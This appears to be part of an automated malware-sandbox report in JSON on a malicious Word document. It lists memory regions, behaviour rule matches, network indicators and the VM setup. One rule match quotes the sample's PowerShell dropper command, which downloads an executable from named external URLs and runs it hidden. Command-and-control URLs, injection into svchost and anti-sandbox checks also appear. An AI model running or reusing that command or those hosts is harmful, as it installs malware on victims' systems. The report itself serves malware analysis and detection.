[ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791779049472, "type": "region", "version": 1 }, "end_va": 8791781158911, "entry_point": 8791779193648, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1555", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791779049472, "timestamp": "00:02:07.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791784095744, "type": "region", "version": 1 }, "end_va": 8791784558591, "entry_point": 8791784168992, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1556", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791784095744, "timestamp": "00:02:07.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791784620032, "type": "region", "version": 1 }, "end_va": 8791784677375, "entry_point": 8791784624256, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1557", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791784620032, "timestamp": "00:02:07.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791787241472, "type": "region", "version": 1 }, "end_va": 8791787368447, "entry_point": 8791787266280, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1558", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791787241472, "timestamp": "00:02:07.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791787372544, "type": "region", "version": 1 }, "end_va": 8791788253183, "entry_point": 8791787385460, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1559", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791787372544, "timestamp": "00:02:07.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791790059520, "type": "region", "version": 1 }, "end_va": 8791790063615, "entry_point": 8791790059520, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1560", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791790059520, "timestamp": "00:02:07.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_1561", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:02:07.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092837888, "type": "region", "version": 1 }, "end_va": 8796092846079, "entry_point": 0, "filename": null, "id": "region_1562", "name": "private_0x000007fffffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092837888, "timestamp": "00:02:07.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092846080, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_1563", "name": "private_0x000007fffffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092846080, "timestamp": "00:02:07.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092854272, "type": "region", "version": 1 }, "end_va": 8796092862463, "entry_point": 0, "filename": null, "id": "region_1564", "name": "private_0x000007fffffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092854272, "timestamp": "00:02:07.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092862464, "type": "region", "version": 1 }, "end_va": 8796092870655, "entry_point": 0, "filename": null, "id": "region_1565", "name": "private_0x000007fffffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092862464, "timestamp": "00:02:07.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092870656, "type": "region", "version": 1 }, "end_va": 8796092878847, "entry_point": 0, "filename": null, "id": "region_1566", "name": "private_0x000007fffffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092870656, "timestamp": "00:02:07.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092878848, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_1567", "name": "private_0x000007fffffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092878848, "timestamp": "00:02:07.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8796092887040, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_1568", "name": "private_0x000007fffffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092887040, "timestamp": "00:02:07.652", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 } ], "remarks": { "critical": [], "non_critical": [ { "comment": "The maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.", "id": 2048, "type": "remark", "version": 1 }, { "comment": "The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.", "id": 512, "type": "remark", "version": 1 }, { "comment": "The overall sleep time of all monitored processes was truncated from 50 seconds to 20 seconds to reveal dormant functionality.", "id": 262144, "type": "remark", "version": 1 } ], "type": "remarks", "version": 1 }, "sample_details": { "filename": "2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca.doc", "id": 19183, "md5_hash": "8c16de37cccc9788384adb61c118ba2c", "sample_type": "word_document", "sha1_hash": "c54b16bd6a507bbbb832c4c62b894f426acecf31", "sha256_hash": "2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca", "size": 101888, "type": "sample_details", "version": 1 }, "screenshots": [ { "screenshot_archive_path": "screenshots/screenshot_0.png", "size": 253851, "thumbnail_archive_path": "screenshots/thumbnail_0.png", "timestamp": "00:00:00.000", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_30497.png", "size": 252851, "thumbnail_archive_path": "screenshots/thumbnail_30497.png", "timestamp": "00:00:30.497", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_37598.png", "size": 251255, "thumbnail_archive_path": "screenshots/thumbnail_37598.png", "timestamp": "00:00:37.598", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_39643.png", "size": 52483, "thumbnail_archive_path": "screenshots/thumbnail_39643.png", "timestamp": "00:00:39.643", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_40644.png", "size": 238448, "thumbnail_archive_path": "screenshots/thumbnail_40644.png", "timestamp": "00:00:40.644", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_52775.png", "size": 237054, "thumbnail_archive_path": "screenshots/thumbnail_52775.png", "timestamp": "00:00:52.775", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_99795.png", "size": 237467, "thumbnail_archive_path": "screenshots/thumbnail_99795.png", "timestamp": "00:01:39.795", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_115139.png", "size": 236909, "thumbnail_archive_path": "screenshots/thumbnail_115139.png", "timestamp": "00:01:55.139", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_116594.png", "size": 938436, "thumbnail_archive_path": "screenshots/thumbnail_116594.png", "timestamp": "00:01:56.594", "type": "screenshot", "version": 1 } ], "type": "summary", "version": 1, "vm_and_analyzer_details": { "adobe_acrobat_reader_version": "not_installed", "analyzer_build_date": "2017-09-12 16:39", "analyzer_version": "2.2.0", "chrome_version": "59.0.3071.115", "firefox_version": "25.0", "flash_version": "10.3.183.90", "internet_explorer_version": "8.0.7601.17514", "java_version": "7.0.710", "microsoft_excel_version": "15.0.4569.1504", "microsoft_office_version": "15.0.4569.1504", "microsoft_power_point_version": "15.0.4569.1504", "microsoft_project_version": "15.0.4569.1504", "microsoft_publisher_version": "15.0.4569.1504", "microsoft_visio_version": "15.0.4569.1504", "microsoft_word_version": "15.0.4569.1504", "silverlight_version": "not_installed", "type": "vm_and_analyzer_details", "version": 1, "vm_architecture": "x86_64-bit", "vm_kernel_version": "6.1.7601.17514_(3844dbb9-2017-4967-be7a-a4a2c20430fa)", "vm_name": null, "vm_os": "windows_7" }, "vti": { "type": "vti", "version": 1, "vti_built_in_rules_version": "2.6", "vti_rule_matches": [ { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_341", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"cmd /c PowerShell \"'PowerShell \"\"function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''%TMP%\\Mvmubw.exe'');Start-Process ''%TMP%\\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'\"\" | Out-File -encoding ASCII -FilePath %TMP%\\Mbovxo.bat;Start-Process '%TMP%\\Mbovxo.bat' -WindowStyle Hidden\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_403", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1323", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\Mbovxo.bat\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_2087", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\.net clr networking\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [ { "ip_address": "93.185.102.11", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_request_dns", "operation_desc": "Perform DNS request", "ref_gfncalls": [ { "ref_id": "gfn_2112", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_request_dns_by_name", "technique_desc": "Resolve host name \"www.events4u.cz\".", "technique_path": "built_in._network._request_dns.vmray_request_dns_by_name", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_2194", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\Mvmubw.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_detect_application_sandbox", "operation_desc": "Try to detect application sandbox", "ref_gfncalls": [ { "ref_id": "gfn_2285", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_detect_application_sandbox_by_dll", "technique_desc": "Possibly trying to detect \"Sandboxie\" by checking for existence of module \"SbieDll.dll\".", "technique_path": "built_in._anti_analysis._detect_application_sandbox.vmray_detect_application_sandbox_by_dll", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_detect_application_sandbox", "operation_desc": "Try to detect application sandbox", "ref_gfncalls": [ { "ref_id": "gfn_2288", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_detect_application_sandbox_by_dll", "technique_desc": "Possibly trying to detect \"Threatexpert\" by checking for existence of module \"dbghelp.dll\".", "technique_path": "built_in._anti_analysis._detect_application_sandbox.vmray_detect_application_sandbox_by_dll", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_detect_forensic_tool", "operation_desc": "Try to detect forensic tool", "ref_gfncalls": [ { "ref_id": "gfn_2289", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_detect_forensic_tool_by_module", "technique_desc": "Check the existence of DLL \"SunBelt Sandbox\".", "technique_path": "built_in._anti_analysis._detect_forensic_tool.vmray_detect_forensic_tool_by_module", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_detect_forensic_tool", "operation_desc": "Try to detect forensic tool", "ref_gfncalls": [ { "ref_id": "gfn_2293", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_detect_forensic_tool_by_module", "technique_desc": "Check the existence of DLL \"Winsock Packet Editor\".", "technique_path": "built_in._anti_analysis._detect_forensic_tool.vmray_detect_forensic_tool_by_module", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_2304", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winapp\\Mvnucw.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_2376", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"svchost.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_read_from_remote_process", "operation_desc": "Read from memory of another process", "ref_gfncalls": [ { "ref_id": "gfn_2384", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_from_remote_process", "technique_desc": "\"c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winapp\\mvnucw.exe\" reads from \"svchost.exe\".", "technique_path": "built_in._process._read_from_remote_process.vmray_read_from_remote_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\VLock", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_3869", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\VLock\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_execute_encoded_powershell_script", "operation_desc": "Execute encoded PowerShell script", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_encoded_powershell_script", "technique_desc": "Execute encoded PowerShell script to possibly hide malicious payload.", "technique_path": "built_in._process._execute_encoded_powershell_script.vmray_execute_encoded_powershell_script", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_handle_with_malicious_files", "operation_desc": "Handle with malicious files", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_handle_with_malicious_files", "technique_desc": "File \"c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\mvmubw.exe\" is a known malicious file.", "technique_path": "built_in._file_system._handle_with_malicious_files.vmray_handle_with_malicious_files", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_memory_system", "operation_desc": "Write into memory of another process", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_memory_system", "technique_desc": "\"c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winapp\\mvnucw.exe\" modifies memory of \"c:\\windows\\system32\\svchost.exe\"", "technique_path": "built_in._injection._modify_memory_system.vmray_modify_memory_system", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_check_external_ip", "operation_desc": "Check external IP address", "ref_gfncalls": [], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_check_external_ip", "technique_desc": "Check external IP by asking IP info service at \"myexternalip.com/raw\".", "technique_path": "built_in._network._check_external_ip.vmray_check_external_ip", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_connect", "operation_desc": "Connect to remote host", "ref_gfncalls": [ { "ref_id": "gfn_2115", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_out_connection", "technique_desc": "Outgoing TCP connection to host \"93.185.102.11:80\".", "technique_path": "built_in._network._connect.vmray_tcp_out_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"www.events4u.cz/kas23.png\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"myexternalip.com/raw\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [ { "operations": [ "get" ], "type": "url_artifact", "url": "212.38.166.20/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/systeminfo64/", "version": 1 } ], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_establish_http_connection", "operation_desc": "Connect to HTTP server", "ref_gfncalls": [ { "ref_id": "gfn_3980", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "establish_http_connection", "technique_desc": "URL \"212.38.166.20/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/systeminfo64/\".", "technique_path": "built_in._network._establish_http_connection.establish_http_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_packed_pe_file", "operation_desc": "PE file is packed", "ref_gfncalls": [], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_check_for_packed_pe_file", "technique_desc": "File \"c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\mvmubw.exe\" is packed with \"Armadillo v1.71\".", "technique_path": "built_in._pe._packed_pe_file.vmray_check_for_packed_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_packed_pe_file", "operation_desc": "PE file is packed", "ref_gfncalls": [], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_check_for_packed_pe_file", "technique_desc": "File \"\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winapp\\Mvnucw.exe\" is packed with \"Armadillo v1.71\".", "technique_path": "built_in._pe._packed_pe_file.vmray_check_for_packed_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_drop_pe_file", "operation_desc": "Drop PE file", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_drop_pe_file", "technique_desc": "Drop file \"c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\mvmubw.exe\".", "technique_path": "built_in._pe._drop_pe_file.vmray_drop_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_execute_dropped_pe_file", "operation_desc": "Execute dropped PE file", "ref_gfncalls": [], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_dropped_pe_file", "technique_desc": "Execute dropped file \"c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\mvmubw.exe\".", "technique_path": "built_in._pe._execute_dropped_pe_file.vmray_execute_dropped_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_vba", "category_desc": "VBA Macro", "operation": "_execute_macro_on_ws_event", "operation_desc": "Execute macro on specific worksheet event", "ref_gfncalls": [], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_macro_on_ws_event", "technique_desc": "Execute macro on \"Activate Workbook\" event.", "technique_path": "built_in._vba._execute_macro_on_ws_event.vmray_execute_macro_on_ws_event", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_vba", "category_desc": "VBA Macro", "operation": "_execute_application", "operation_desc": "Execute application", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_application", "technique_desc": "Shell myform1.TextBox2, 0", "technique_path": "built_in._vba._execute_application.vmray_execute_application", "type": "vti_rule_match", "version": 1 } ], "vti_rule_type": "Documents", "vti_score": 100 }, "yara": { "apply_yara": true, "apply_yara_on_created_files": true, "apply_yara_on_modified_files": true, "apply_yara_on_pcap_file": true, "apply_yara_on_process_dumps": true, "apply_yara_on_sample_files": true, "match_count": 0, "matches": [], "ruleset_count": 7, "type": "yara", "version": 1 } }